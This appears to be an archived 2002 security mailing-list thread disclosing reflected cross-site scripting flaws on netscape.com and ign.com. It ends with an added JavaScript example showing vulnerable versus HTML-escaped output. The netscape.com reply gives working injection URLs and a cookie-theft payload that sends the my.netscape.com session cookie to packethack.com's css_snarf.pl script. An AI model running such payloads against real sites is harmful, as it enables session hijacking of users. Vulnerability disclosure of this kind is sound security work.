Re: CSS -> ign.com

I think it's important to notify the public about CSS vulnerabilities when
a certain threshold of severity is reached.  Who decides what is severe?
That probably falls in the lap of the list moderator. I've found quite a
few of these vulnerabilities but most of them are, in my mind,
insignificant.  Most of the sites I have found vulnerabilities in don't
store anything sensitive in cookies, aren't used as a public forum (message
board), don't authenticate users, or they simply aren't "main stream"
enough.  In these cases it's enough to send the admins of such domains an
email and move on. 

With this in mind, a few weeks ago I found four CSS vulnerabilities in
netscape.com:

http://pfquotes.netscape.com/finance/quotes/quotes.tmpl?symbol=');alert('test
http://search.netscape.com/search.psp?search=";><script>alert('test')</script>
http://yp.netscape.com/setlocation.adp?addressloc=";><script>alert('test')</script>
http://webcenter.newssearch.netscape.com/aolns_search.adp?query=";><script>alert('test')</script>

and constructed a URL that demonstrates theft of my.netscape.com cookies.

Set up a my.netscape.com account, then go here:

<IMPORTANT NOTE>
This will send the contents of your cookie to packethack.com simply to
display the contents of your cookie and to demonstrate how cookies can be
sent to remote servers.
</IMPORTANT NOTE>

http://search.netscape.com/search.psp?search=";><script>function gcv(os){var endstr=document.cookie.indexOf("/",os);if(endstr==-1)endstr=document.cookie.length;return unescape(document.cookie.substring(os,endstr));}function gc(n){var arg=n%2B"=";var alen=arg.length;var clen=document.cookie.length;var i=0;while(i<clen){var j=i%2Balen;if(document.cookie.substring(i,j)==arg)return gcv(j);i=document.cookie.indexOf(" ",i)%2B1;if(i==0)break;}return null;}window.document.location.href="http://www.packethack.com/cgi-bin/css_snarf.pl?val="%2Bgc('NSCPHPAD1');</script>

I have noticed that the cookie name occasionally changes from NSCPHPAD1 so
you may need to play with that.

Netscape was contacted about this a while ago but I never received a
response.  Now, is this important enough to send to bugtraq?  I guess I'll
find out in the AM.

-Blake

On Tue, 5 Feb 2002, Knud Erik Højgaard wrote:

> To add to the late plethora of CSS bugs, ign.com has some too. 
> 
> 'Vendor' contacted about a week ago at various mail addresses, no reply.
> 
> visiting http://mediaviewer.ign.com/mediaPage.jsp?object_id=15984&media_type=P&ign_section=17&adtag=network%3Dign%26site%3Dps2viewer%26adchannel%3Dps2%26pagetype%3Darticle&page_title=knud+fighter+4 
> 
> will show you some screenshots from 'knud fighter 4' (really virtua fighter 4 shots).. the &page_title=blabla doesn't filter <tags> so it's possible to steal cookies and whatnot.. I haven't tried in the members section, since I can't really access it without an account, but I assume it uses the same files since ps2.ign.com/pc.ign.com/pocket.ign.com all utilize mediaviewer.ign.com/mediaPage.jsp for their media (p)reviews.
> 
> random thought: is bugtraq really the correct place for css bugs? many vulnerable scripts are 'homemade' .. so it's not like there's much value in reporting 'site x has css bug in blah.php' ..
> 
> -Knud
> 
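Both messages in this thread describe the same defect: a query parameter copied verbatim into the page, so a value that starts by closing the attribute and tag can inject a script element. The following is an added example, not code from either poster or from the sites named; the page skeleton, the parameter name and the sample request are assumptions modelled on the search.psp URL above, and it shows the vulnerable echo beside the escaped one that would have made the reported payloads inert.

```javascript
// Added example: reflected parameter echoed into an HTML attribute,
// vulnerable form beside the hardened (HTML-escaped) form.
// The template and parameter name are assumptions, not the real search.psp.

// Escape the five characters that can change meaning in HTML text or
// in a double- or single-quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Vulnerable: the raw parameter lands inside value="...", so a value
// beginning with "> closes the attribute and the <input> tag.
function renderVulnerable(search) {
  return `<input name="search" value="${search}">`;
}

// Hardened: the same template, but every reflected value is escaped for
// the attribute context before it is inserted.
function renderHardened(search) {
  return `<input name="search" value="${escapeHtml(search)}">`;
}

// Pull the reflected parameter out of the request URL, as the server would.
function searchParam(url) {
  return new URL(url).searchParams.get("search") ?? "";
}

// True if the rendered page contains a script element the template never had.
function containsScript(html) {
  return /<script\b/i.test(html);
}

// Constructed sample request, following the pattern reported in the thread.
const SAMPLE_URL =
  'http://search.netscape.com/search.psp?search=";><script>alert(\'test\')</script>';

const reflected = searchParam(SAMPLE_URL);
console.log("vulnerable:", renderVulnerable(reflected), containsScript(renderVulnerable(reflected)));
console.log("hardened:  ", renderHardened(reflected), containsScript(renderHardened(reflected)));
```

Escaping is context-specific; the same value placed inside a script block or a URL attribute would need a different encoder, which is why the check here is tied to the attribute context the template uses.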
